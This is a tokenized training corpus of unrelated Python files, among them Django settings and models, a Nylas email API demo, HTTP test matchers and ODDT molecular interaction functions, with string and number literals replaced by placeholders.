'<STR_LIT>' <EOL> TEMPLATE_LOADERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> import warnings <EOL> warnings . 
filterwarnings ( '<STR_LIT:error>' , r"<STR_LIT>" , RuntimeWarning , r'<STR_LIT>' ) <EOL> TEMPLATE_CONTEXT_PROCESSORS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> TEMPLATE_DIRS = ( <EOL> ) <EOL> INSTALLED_APPS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> LOGGING = { <EOL> '<STR_LIT:version>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:class>' : '<STR_LIT>' <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> } <EOL> } <EOL> AUTHENTICATION_BACKENDS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> PERMISSIONS = { <EOL> '<STR_LIT:*>' : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:list>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , ) <EOL> } <EOL> ANONYMOUS_PERMISSIONS = ( <EOL> '<STR_LIT>' , <EOL> ) <EOL> GROUP_PERMISSIONS = { <EOL> "<STR_LIT>" : ( '<STR_LIT>' , ) , <EOL> "<STR_LIT>" : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> "<STR_LIT>" : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> } <EOL> LOGIN_URL = '<STR_LIT>' <EOL> LOGIN_REDIRECT_URL = "<STR_LIT>" <EOL> CELERY_RESULT_BACKEND = '<STR_LIT>' <EOL> BROKER_BACKEND = '<STR_LIT>' <EOL> BROKER_HOST = '<STR_LIT:localhost>' <EOL> BROKER_PORT = <NUM_LIT> <EOL> BROKER_VHOST = '<STR_LIT:4>' </s>
<s> import json <EOL> import re <EOL> import pytest <EOL> import time <EOL> import datetime <EOL> import sys <EOL> from nylas import APIClient <EOL> from nylas . client . restful_models import Label , Folder <EOL> from nylas . client . errors import * <EOL> from credentials import APP_ID , APP_SECRET , AUTH_TOKEN <EOL> client = APIClient ( APP_ID , APP_SECRET , AUTH_TOKEN ) <EOL> count = <NUM_LIT:0> <EOL> print "<STR_LIT>" <EOL> for account in client . accounts : <EOL> print ( account . email_address , account . provider ) <EOL> print '<STR_LIT>' <EOL> th = client . threads . where ( { '<STR_LIT>' : '<STR_LIT>' } ) . first ( ) <EOL> print th . subject <EOL> th . mark_as_unread ( ) <EOL> print "<STR_LIT>" <EOL> for thread in client . threads . items ( ) : <EOL> print thread . subject <EOL> count += <NUM_LIT:1> <EOL> if count == <NUM_LIT:10> : <EOL> break <EOL> print "<STR_LIT>" <EOL> draft = client . drafts . create ( ) <EOL> draft . to = [ { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:email>' : '<STR_LIT>' } ] <EOL> draft . subject = "<STR_LIT>" <EOL> draft . body = "<STR_LIT>" <EOL> draft . send ( ) <EOL> print '<STR_LIT>' <EOL> calendar = filter ( lambda cal : not cal . read_only , client . calendars ) [ <NUM_LIT:0> ] <EOL> ev = client . events . create ( ) <EOL> ev . title = "<STR_LIT>" <EOL> d1 = datetime . datetime . now ( ) + datetime . timedelta ( days = <NUM_LIT:5> , hours = <NUM_LIT:4> ) <EOL> d2 = datetime . datetime . now ( ) + datetime . timedelta ( days = <NUM_LIT:5> , hours = <NUM_LIT:5> ) <EOL> ev . when = { "<STR_LIT>" : time . mktime ( d1 . timetuple ( ) ) , "<STR_LIT>" : time . mktime ( d2 . timetuple ( ) ) } <EOL> ev . location = "<STR_LIT>" <EOL> ev . participants = [ { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:email>' : '<STR_LIT>' } ] <EOL> ev . calendar_id = calendar . id <EOL> ev . save ( notify_participants = '<STR_LIT:true>' ) <EOL> print '<STR_LIT>' <EOL> for label in client . labels : <EOL> print label . display_name </s>
<s> n_samples = [ [ <NUM_LIT> , <NUM_LIT:1000> , <NUM_LIT:1000> ] , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] <EOL> max_hops = [ <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:8> ] <EOL> max_hops_pages = <NUM_LIT:10> <EOL> max_sents = <NUM_LIT:5> <EOL> max_links = <NUM_LIT> <EOL> min_words_query = <NUM_LIT:10> <EOL> max_words_query = <NUM_LIT:30> <EOL> n_words = <NUM_LIT> <EOL> n_consec = <NUM_LIT:4> <EOL> root_page = '<STR_LIT>' <EOL> vocab_path = '<STR_LIT>' <EOL> wordemb_path = '<STR_LIT>' <EOL> idf_path = '<STR_LIT>' <EOL> pages_path = '<STR_LIT>' <EOL> pages_emb_path = '<STR_LIT>' <EOL> qp_path_pre = '<STR_LIT>' <EOL> compute_page_pos = False <EOL> dump_path = '<STR_LIT>' <EOL> page_pos_path = '<STR_LIT>' <EOL> cat_pages_path = '<STR_LIT>' <EOL> qp_path = '<STR_LIT>' <EOL> visited_pages_path = None <EOL> dim_proj = <NUM_LIT> <EOL> dim_emb = <NUM_LIT> <EOL> patience = <NUM_LIT:100> <EOL> max_epochs = <NUM_LIT> <EOL> dispFreq = <NUM_LIT:10> <EOL> lrate = <NUM_LIT> <EOL> erate = <NUM_LIT:0.1> <EOL> saveto = '<STR_LIT>' <EOL> validFreq = <NUM_LIT> <EOL> saveFreq = <NUM_LIT> <EOL> batch_size_train = <NUM_LIT:16> <EOL> batch_size_pred = <NUM_LIT:4> <EOL> max_hops_train = <NUM_LIT:2> <EOL> max_hops_pred = <NUM_LIT:4> <EOL> learning = '<STR_LIT>' <EOL> act_sel = '<STR_LIT>' <EOL> encoder = '<STR_LIT>' <EOL> n_layers = <NUM_LIT:1> <EOL> reload_model = False <EOL> idb = False <EOL> train_size = <NUM_LIT:1000> <EOL> valid_size = <NUM_LIT:1000> <EOL> test_size = <NUM_LIT:1000> <EOL> outpath = "<STR_LIT>" <EOL> fixed_wemb = True <EOL> k = <NUM_LIT:4> <EOL> att_query = False <EOL> att_doc = False <EOL> att_segment_type = '<STR_LIT>' <EOL> max_segs_doc = <NUM_LIT:10> <EOL> att_window = <NUM_LIT:3> <EOL> mixer = <NUM_LIT:0> <EOL> replay_mem_size = <NUM_LIT> <EOL> replay_start = <NUM_LIT> <EOL> freeze_mem = <NUM_LIT> <EOL> selective_mem = - <NUM_LIT:1> <EOL> update_freq = <NUM_LIT:100> <EOL> epsilon_start = <NUM_LIT:1.0> <EOL> epsilon_min = 
<NUM_LIT> <EOL> epsilon_decay = <NUM_LIT:1> <EOL> discount = <NUM_LIT> <EOL> clip = <NUM_LIT:1.0> <EOL> load_emb_mem = True </s>
<s> class Bot ( ) : <EOL> @ staticmethod <EOL> def from_json ( json ) : <EOL> if json : <EOL> return Bot ( name = json . get ( "<STR_LIT:name>" , "<STR_LIT>" ) , <EOL> id = json [ "<STR_LIT>" ] , <EOL> integration_counter = json . get ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> else : <EOL> return EmptyBot ( ) <EOL> def __init__ ( self , ** args ) : <EOL> self . name = args [ "<STR_LIT:name>" ] <EOL> self . id = args [ "<STR_LIT:id>" ] <EOL> self . integration_counter = args [ "<STR_LIT>" ] <EOL> def __repr__ ( self ) : <EOL> return self . __dict__ . __str__ ( ) <EOL> class EmptyBot ( ) : <EOL> def __init__ ( self , ** args ) : <EOL> self . name = "<STR_LIT>" <EOL> self . id = "<STR_LIT>" <EOL> self . integration_counter = "<STR_LIT>" </s>
<s> import json <EOL> from should_dsl import matcher <EOL> from werkzeug . http import HTTP_STATUS_CODES <EOL> @ matcher <EOL> class GenericStatusChecker ( object ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> def __call__ ( self , expected ) : <EOL> self . _expected = expected <EOL> return self <EOL> def match ( self , response ) : <EOL> self . _actual = response . status_code <EOL> return self . _actual == self . _expected <EOL> def message_for_failed_should ( self ) : <EOL> return '<STR_LIT>' . format ( <EOL> self . _expected , self . _actual <EOL> ) <EOL> def message_for_failed_should_not ( self ) : <EOL> return '<STR_LIT>' . format ( self . _expected ) <EOL> def make_status_checker ( nameprefix , status ) : <EOL> '''<STR_LIT>''' <EOL> class Checker ( object ) : <EOL> name = '<STR_LIT>' . format ( nameprefix , status ) <EOL> def __call__ ( self ) : <EOL> return self <EOL> def match ( self , response ) : <EOL> self . _actual = response . status_code <EOL> self . _response_data = response . data <EOL> return self . _actual == status <EOL> def message_for_failed_should ( self ) : <EOL> message = '<STR_LIT>' . format ( <EOL> status , self . _actual <EOL> ) <EOL> if self . _response_data : <EOL> response = '<STR_LIT>' . format ( self . _response_data ) <EOL> message = '<STR_LIT:\n>' . join ( [ message , response ] ) <EOL> return message <EOL> def message_for_failed_should_not ( self ) : <EOL> return '<STR_LIT>' . format ( status ) <EOL> return Checker <EOL> _status_codes = HTTP_STATUS_CODES . keys ( ) <EOL> for code in _status_codes : <EOL> matcher ( make_status_checker ( '<STR_LIT>' , code ) ) <EOL> matcher ( make_status_checker ( '<STR_LIT>' , code ) ) <EOL> matcher ( make_status_checker ( '<STR_LIT>' , code ) ) <EOL> @ matcher <EOL> class RedirectMatcher ( object ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> def __call__ ( self , location ) : <EOL> self . _expected = '<STR_LIT>' + location <EOL> self . 
_status_ok = True <EOL> return self <EOL> def match ( self , response ) : <EOL> self . _actual_status = response . status_code <EOL> self . _actual_location = response . location <EOL> if self . _actual_status not in ( <NUM_LIT> , <NUM_LIT> ) : <EOL> self . _status_ok = False <EOL> return False <EOL> return self . _actual_location == self . _expected <EOL> def message_for_failed_should ( self ) : <EOL> if self . _status_ok : <EOL> return '<STR_LIT>' . format ( <EOL> self . _expected , self . _actual_location <EOL> ) <EOL> else : <EOL> return '<STR_LIT>' . format ( <EOL> self . _actual_status <EOL> ) <EOL> def message_for_failed_should_not ( self ) : <EOL> return '<STR_LIT>' . format ( <EOL> self . _expected <EOL> ) <EOL> @ matcher <EOL> class JsonMatcher ( object ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> def __call__ ( self , * pargs , ** kwargs ) : <EOL> if len ( pargs ) > <NUM_LIT:1> : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> if len ( kwargs ) > <NUM_LIT:0> : <EOL> if len ( pargs ) != <NUM_LIT:0> : <EOL> raise Exception ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> self . _expected = dict ( ** kwargs ) <EOL> else : <EOL> self . _expected = pargs [ <NUM_LIT:0> ] <EOL> return self <EOL> def match ( self , response ) : <EOL> try : <EOL> self . _actual = response . json <EOL> except AttributeError : <EOL> self . _actual = json . loads ( response . data ) <EOL> return self . _actual == self . _expected <EOL> def message_for_failed_should ( self ) : <EOL> return "<STR_LIT>" . format ( <EOL> self . _expected , self . _actual <EOL> ) <EOL> def message_for_failed_should_not ( self ) : <EOL> return "<STR_LIT>" . format ( <EOL> self . _expected <EOL> ) <EOL> @ matcher <EOL> class ContentTypeMatcher ( object ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> def __call__ ( self , content_type ) : <EOL> self . _mimetype = content_type . find ( '<STR_LIT:;>' ) == - <NUM_LIT:1> <EOL> self . _match_either = content_type . 
find ( '<STR_LIT:/>' ) == - <NUM_LIT:1> <EOL> self . _wildcard = any ( <EOL> True for sec in content_type . split ( '<STR_LIT:/>' ) if sec == '<STR_LIT:*>' <EOL> ) <EOL> self . _expected = content_type <EOL> return self <EOL> def match ( self , response ) : <EOL> if self . _expected == '<STR_LIT:*>' : <EOL> return True <EOL> if self . _mimetype : <EOL> self . _actual = response . mimetype <EOL> sections = self . _actual . split ( '<STR_LIT:/>' ) <EOL> if self . _match_either : <EOL> return any ( True for sec in sections if sec == self . _expected ) <EOL> if self . _wildcard : <EOL> expectedsections = self . _expected . split ( '<STR_LIT:/>' ) <EOL> for actual , expected in zip ( sections , expectedsections ) : <EOL> if actual != expected and expected != '<STR_LIT:*>' : <EOL> return False <EOL> return True <EOL> else : <EOL> self . _actual = response . content_type <EOL> return self . _actual == self . _expected <EOL> def message_for_failed_should ( self ) : <EOL> return "<STR_LIT>" . format ( <EOL> self . _expected , self . _actual <EOL> ) <EOL> def message_for_failed_should_not ( self ) : <EOL> return "<STR_LIT>" . format ( self . _expected ) <EOL> @ matcher <EOL> class HeaderMatcher ( object ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> def __call__ ( self , * pargs ) : <EOL> if len ( pargs ) == <NUM_LIT:1> : <EOL> expected = pargs [ <NUM_LIT:0> ] . split ( '<STR_LIT::>' ) <EOL> elif len ( pargs ) == <NUM_LIT:2> : <EOL> expected = pargs <EOL> else : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> self . _expected_name = expected [ <NUM_LIT:0> ] <EOL> try : <EOL> self . _expected_value = expected [ <NUM_LIT:1> ] . strip ( ) <EOL> self . _check_value = True <EOL> except IndexError : <EOL> self . _check_value = False <EOL> return self <EOL> def match ( self , response ) : <EOL> self . _value_found = None <EOL> for name , value in response . header_list : <EOL> if name == self . _expected_name : <EOL> self . _value_found = value <EOL> if not self . 
_check_value : <EOL> return True <EOL> elif value == self . _expected_value : <EOL> return True <EOL> return False <EOL> def message_for_failed_should ( self ) : <EOL> if self . _value_found : <EOL> return "<STR_LIT>" . format ( <EOL> self . _expected_name , self . _expected_value , self . _value_found <EOL> ) <EOL> return "<STR_LIT>" . format ( <EOL> self . _expected_name <EOL> ) <EOL> def message_for_failed_should_not ( self ) : <EOL> if self . _check_value : <EOL> return "<STR_LIT>" . format ( <EOL> self . _expected_name , self . _expected_value <EOL> ) <EOL> return "<STR_LIT>" . format ( <EOL> self . _expected_name <EOL> ) <EOL> @ matcher <EOL> class ContentMatcher ( object ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> def __call__ ( self , content , find = False ) : <EOL> self . _expected = content <EOL> self . _find = find <EOL> return self <EOL> def match ( self , response ) : <EOL> self . _actual = response . data <EOL> if self . _find : <EOL> return self . _actual . find ( self . _expected ) != - <NUM_LIT:1> <EOL> else : <EOL> return self . _actual == self . _expected <EOL> def message_for_failed_should ( self ) : <EOL> if self . _find : <EOL> if self . _multiline : <EOL> message = "<STR_LIT>" <EOL> else : <EOL> message = "<STR_LIT>" <EOL> else : <EOL> if self . _multiline : <EOL> message = "<STR_LIT>" <EOL> else : <EOL> message = "<STR_LIT>" <EOL> return message . format ( self . _expected , self . _actual ) <EOL> def message_for_failed_should_not ( self ) : <EOL> if self . _find : <EOL> if self . _multiline : <EOL> message = "<STR_LIT>" + "<STR_LIT>" <EOL> else : <EOL> message = "<STR_LIT>" <EOL> return message . format ( self . _expected , self . _actual ) <EOL> else : <EOL> if self . _multiline : <EOL> message = "<STR_LIT>" <EOL> else : <EOL> message = "<STR_LIT>" <EOL> return message . format ( self . _expected ) <EOL> @ property <EOL> def _multiline ( self ) : <EOL> '''<STR_LIT>''' <EOL> for string in [ self . _expected , self . 
_actual ] : <EOL> if len ( string ) > <NUM_LIT> or string . find ( '<STR_LIT:\n>' ) != - <NUM_LIT:1> : <EOL> return True <EOL> return False </s>
<s> from google . appengine . ext import db <EOL> from PerformanceEngine import pdb <EOL> class PdbModel ( pdb . Model ) : <EOL> name = db . StringProperty ( ) <EOL> count = db . IntegerProperty ( ) <EOL> class TestModel ( db . Model ) : <EOL> name = db . StringProperty ( ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> from oddt . spatial import dihedral , angle , angle_2v , distance <EOL> __all__ = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> def close_contacts ( x , y , cutoff , x_column = '<STR_LIT>' , y_column = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if len ( x [ x_column ] ) > <NUM_LIT:0> and len ( x [ x_column ] ) > <NUM_LIT:0> : <EOL> d = distance ( x [ x_column ] , y [ y_column ] ) <EOL> index = np . argwhere ( ( d > <NUM_LIT:0> ) & ( d <= cutoff ) ) <EOL> return x [ index [ : , <NUM_LIT:0> ] ] , y [ index [ : , <NUM_LIT:1> ] ] <EOL> else : <EOL> return x [ [ ] ] , y [ [ ] ] <EOL> def hbond_acceptor_donor ( mol1 , mol2 , cutoff = <NUM_LIT> , base_angle = <NUM_LIT> , tolerance = <NUM_LIT:30> ) : <EOL> """<STR_LIT>""" <EOL> a , d = close_contacts ( mol1 . atom_dict [ mol1 . atom_dict [ '<STR_LIT>' ] ] , mol2 . atom_dict [ mol2 . atom_dict [ '<STR_LIT>' ] ] , cutoff ) <EOL> if len ( a ) > <NUM_LIT:0> and len ( d ) > <NUM_LIT:0> : <EOL> angle1 = angle ( d [ '<STR_LIT>' ] [ : , np . newaxis , : ] , a [ '<STR_LIT>' ] [ : , np . newaxis , : ] , a [ '<STR_LIT>' ] ) <EOL> angle2 = angle ( a [ '<STR_LIT>' ] [ : , np . newaxis , : ] , d [ '<STR_LIT>' ] [ : , np . newaxis , : ] , d [ '<STR_LIT>' ] ) <EOL> a_neighbors_num = np . sum ( ~ np . isnan ( a [ '<STR_LIT>' ] [ : , : , <NUM_LIT:0> ] ) , axis = - <NUM_LIT:1> ) [ : , np . newaxis ] <EOL> d_neighbors_num = np . sum ( ~ np . isnan ( d [ '<STR_LIT>' ] [ : , : , <NUM_LIT:0> ] ) , axis = - <NUM_LIT:1> ) [ : , np . newaxis ] <EOL> strict = ( ( ( angle1 > ( base_angle / a_neighbors_num - tolerance ) ) | np . isnan ( angle1 ) ) & ( ( angle2 > ( base_angle / d_neighbors_num - tolerance ) ) | np . isnan ( angle2 ) ) ) . 
all ( axis = - <NUM_LIT:1> ) <EOL> return a , d , strict <EOL> else : <EOL> return a , d , np . array ( [ ] , dtype = bool ) <EOL> def hbond ( mol1 , mol2 , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> a1 , d1 , s1 = hbond_acceptor_donor ( mol1 , mol2 , * args , ** kwargs ) <EOL> a2 , d2 , s2 = hbond_acceptor_donor ( mol2 , mol1 , * args , ** kwargs ) <EOL> return np . concatenate ( ( a1 , d2 ) ) , np . concatenate ( ( d1 , a2 ) ) , np . concatenate ( ( s1 , s2 ) ) <EOL> def halogenbond_acceptor_halogen ( mol1 , mol2 , base_angle_acceptor = <NUM_LIT> , base_angle_halogen = <NUM_LIT> , tolerance = <NUM_LIT:30> , cutoff = <NUM_LIT:4> ) : <EOL> """<STR_LIT>""" <EOL> a , h = close_contacts ( mol1 . atom_dict [ mol1 . atom_dict [ '<STR_LIT>' ] ] , mol2 . atom_dict [ mol2 . atom_dict [ '<STR_LIT>' ] ] , cutoff ) <EOL> if len ( a ) > <NUM_LIT:0> and len ( h ) > <NUM_LIT:0> : <EOL> angle1 = angle ( h [ '<STR_LIT>' ] [ : , np . newaxis , : ] , a [ '<STR_LIT>' ] [ : , np . newaxis , : ] , a [ '<STR_LIT>' ] ) <EOL> angle2 = angle ( a [ '<STR_LIT>' ] [ : , np . newaxis , : ] , h [ '<STR_LIT>' ] [ : , np . newaxis , : ] , h [ '<STR_LIT>' ] ) <EOL> a_neighbors_num = np . sum ( ~ np . isnan ( a [ '<STR_LIT>' ] [ : , : , <NUM_LIT:0> ] ) , axis = - <NUM_LIT:1> ) [ : , np . newaxis ] <EOL> h_neighbors_num = np . sum ( ~ np . isnan ( h [ '<STR_LIT>' ] [ : , : , <NUM_LIT:0> ] ) , axis = - <NUM_LIT:1> ) [ : , np . newaxis ] <EOL> strict = ( ( ( angle1 > ( base_angle_acceptor / a_neighbors_num - tolerance ) ) | np . isnan ( angle1 ) ) & ( ( angle2 > ( base_angle_halogen / h_neighbors_num - tolerance ) ) | np . isnan ( angle2 ) ) ) . all ( axis = - <NUM_LIT:1> ) <EOL> return a , h , strict <EOL> else : <EOL> return a , h , np . 
array ( [ ] , dtype = bool ) <EOL> def halogenbond ( mol1 , mol2 , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> a1 , h1 , s1 = halogenbond_acceptor_halogen ( mol1 , mol2 , ** kwargs ) <EOL> a2 , h2 , s2 = halogenbond_acceptor_halogen ( mol2 , mol1 , ** kwargs ) <EOL> return np . concatenate ( ( a1 , h2 ) ) , np . concatenate ( ( h1 , a2 ) ) , np . concatenate ( ( s1 , s2 ) ) <EOL> def pi_stacking ( mol1 , mol2 , cutoff = <NUM_LIT:5> , tolerance = <NUM_LIT:30> ) : <EOL> """<STR_LIT>""" <EOL> r1 , r2 = close_contacts ( mol1 . ring_dict , mol2 . ring_dict , cutoff , x_column = '<STR_LIT>' , y_column = '<STR_LIT>' ) <EOL> if len ( r1 ) > <NUM_LIT:0> and len ( r2 ) > <NUM_LIT:0> : <EOL> angle1 = angle_2v ( r1 [ '<STR_LIT>' ] , r2 [ '<STR_LIT>' ] ) <EOL> angle2 = angle ( r1 [ '<STR_LIT>' ] + r1 [ '<STR_LIT>' ] , r1 [ '<STR_LIT>' ] , r2 [ '<STR_LIT>' ] ) <EOL> strict_parallel = ( ( angle1 > <NUM_LIT> - tolerance ) | ( angle1 < tolerance ) ) & ( ( angle2 > <NUM_LIT> - tolerance ) | ( angle2 < tolerance ) ) <EOL> strict_perpendicular = ( ( angle1 > <NUM_LIT> - tolerance ) & ( angle1 < <NUM_LIT> + tolerance ) ) & ( ( angle2 > <NUM_LIT> - tolerance ) | ( angle2 < tolerance ) ) <EOL> return r1 , r2 , strict_parallel , strict_perpendicular <EOL> else : <EOL> return r1 , r2 , np . array ( [ ] , dtype = bool ) , np . array ( [ ] , dtype = bool ) <EOL> def salt_bridge_plus_minus ( mol1 , mol2 , cutoff = <NUM_LIT:4> ) : <EOL> """<STR_LIT>""" <EOL> m1_plus , m2_minus = close_contacts ( mol1 . atom_dict [ mol1 . atom_dict [ '<STR_LIT>' ] ] , mol2 . atom_dict [ mol2 . atom_dict [ '<STR_LIT>' ] ] , cutoff ) <EOL> return m1_plus , m2_minus <EOL> def salt_bridges ( mol1 , mol2 , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> m1_plus , m2_minus = salt_bridge_plus_minus ( mol1 , mol2 , * args , ** kwargs ) <EOL> m2_plus , m1_minus = salt_bridge_plus_minus ( mol2 , mol1 , * args , ** kwargs ) <EOL> return np . concatenate ( ( m1_plus , m1_minus ) ) , np . 
concatenate ( ( m2_minus , m2_plus ) ) <EOL> def hydrophobic_contacts ( mol1 , mol2 , cutoff = <NUM_LIT:4> ) : <EOL> """<STR_LIT>""" <EOL> h1 , h2 = close_contacts ( mol1 . atom_dict [ mol1 . atom_dict [ '<STR_LIT>' ] ] , mol2 . atom_dict [ mol2 . atom_dict [ '<STR_LIT>' ] ] , cutoff ) <EOL> return h1 , h2 <EOL> def pi_cation ( mol1 , mol2 , cutoff = <NUM_LIT:5> , tolerance = <NUM_LIT:30> ) : <EOL> """<STR_LIT>""" <EOL> r1 , plus2 = close_contacts ( mol1 . ring_dict , mol2 . atom_dict [ mol2 . atom_dict [ '<STR_LIT>' ] ] , cutoff , x_column = '<STR_LIT>' ) <EOL> if len ( r1 ) > <NUM_LIT:0> and len ( plus2 ) > <NUM_LIT:0> : <EOL> angle1 = angle_2v ( r1 [ '<STR_LIT>' ] , plus2 [ '<STR_LIT>' ] - r1 [ '<STR_LIT>' ] ) <EOL> strict = ( angle1 > <NUM_LIT> - tolerance ) | ( angle1 < tolerance ) <EOL> return r1 , plus2 , strict <EOL> else : <EOL> return r1 , plus2 , np . array ( [ ] , dtype = bool ) <EOL> def acceptor_metal ( mol1 , mol2 , base_angle = <NUM_LIT> , tolerance = <NUM_LIT:30> , cutoff = <NUM_LIT:4> ) : <EOL> """<STR_LIT>""" <EOL> a , m = close_contacts ( mol1 . atom_dict [ mol1 . atom_dict [ '<STR_LIT>' ] ] , mol2 . atom_dict [ mol2 . atom_dict [ '<STR_LIT>' ] ] , cutoff ) <EOL> if len ( a ) > <NUM_LIT:0> and len ( m ) > <NUM_LIT:0> : <EOL> angle1 = angle ( m [ '<STR_LIT>' ] [ : , np . newaxis , : ] , a [ '<STR_LIT>' ] [ : , np . newaxis , : ] , a [ '<STR_LIT>' ] ) <EOL> a_neighbors_num = np . sum ( ~ np . isnan ( a [ '<STR_LIT>' ] [ : , : , <NUM_LIT:0> ] ) , axis = - <NUM_LIT:1> ) [ : , np . newaxis ] <EOL> strict = ( ( angle1 > ( base_angle / a_neighbors_num - tolerance ) ) | np . isnan ( angle1 ) ) . all ( axis = - <NUM_LIT:1> ) <EOL> return a , m , strict <EOL> else : <EOL> return a , m , np . array ( [ ] , dtype = bool ) <EOL> def pi_metal ( mol1 , mol2 , cutoff = <NUM_LIT:5> , tolerance = <NUM_LIT:30> ) : <EOL> """<STR_LIT>""" <EOL> r1 , m = close_contacts ( mol1 . ring_dict , mol2 . atom_dict [ mol2 . 
atom_dict [ '<STR_LIT>' ] ] , cutoff , x_column = '<STR_LIT>' ) <EOL> if len ( r1 ) > <NUM_LIT:0> and len ( m ) > <NUM_LIT:0> : <EOL> angle1 = angle_2v ( r1 [ '<STR_LIT>' ] , m [ '<STR_LIT>' ] - r1 [ '<STR_LIT>' ] ) <EOL> strict = ( angle1 > <NUM_LIT> - tolerance ) | ( angle1 < tolerance ) <EOL> return r1 , m , strict <EOL> else : <EOL> return r1 , m , np . array ( [ ] , dtype = bool ) </s>
<s> from django . db import models <EOL> import chatServerConstants <EOL> class Receipient ( models . Model ) : <EOL> name = models . CharField ( max_length = chatServerConstants . MAX_NAME_LENGTH ) <EOL> alias = models . CharField ( max_length = chatServerConstants . MAX_ALIAS_LENGTH , blank = True ) <EOL> dateCreated = models . DateTimeField ( auto_now_add = True ) <EOL> lastEditTime = models . DateTimeField ( auto_now = True ) <EOL> token = models . CharField ( max_length = chatServerConstants . MAX_TOKEN_LENGTH ) <EOL> photoUri = models . CharField ( max_length = chatServerConstants . MAX_PROFILE_URI_LENGTH , blank = True ) <EOL> def __unicode__ ( self ) : <EOL> return "<STR_LIT>" % ( self . name , self . alias ) <EOL> class Message ( models . Model ) : <EOL> sender = models . ForeignKey ( Receipient , related_name = '<STR_LIT>' ) <EOL> receipient = models . ForeignKey ( Receipient , related_name = '<STR_LIT>' ) <EOL> parentMessage = models . ForeignKey ( '<STR_LIT>' , blank = True , null = True ) <EOL> body = models . CharField ( max_length = chatServerConstants . MAX_BODY_LENGTH , blank = True ) <EOL> subject = models . CharField ( max_length = chatServerConstants . MAX_SUBJECT_LENGTH , blank = True ) <EOL> dateCreated = models . DateTimeField ( auto_now_add = True ) <EOL> lastEditTime = models . DateTimeField ( auto_now = True ) <EOL> def __unicode__ ( self ) : <EOL> return "<STR_LIT>" % ( self . subject ) <EOL> class MessageMarker ( models . Model ) : <EOL> receipient = models . ForeignKey ( Receipient ) <EOL> associatedMessage = models . ForeignKey ( Message ) <EOL> dateCreated = models . DateTimeField ( auto_now_add = True ) <EOL> lastEditTime = models . DateTimeField ( auto_now = True ) <EOL> def __unicode__ ( self ) : <EOL> return "<STR_LIT>" % ( self . receipient , self . associatedMessage ) </s>
<s> from django import forms <EOL> class DocumentForm ( forms . Form ) : <EOL> blob = forms . FileField ( label = '<STR_LIT>' ) </s>
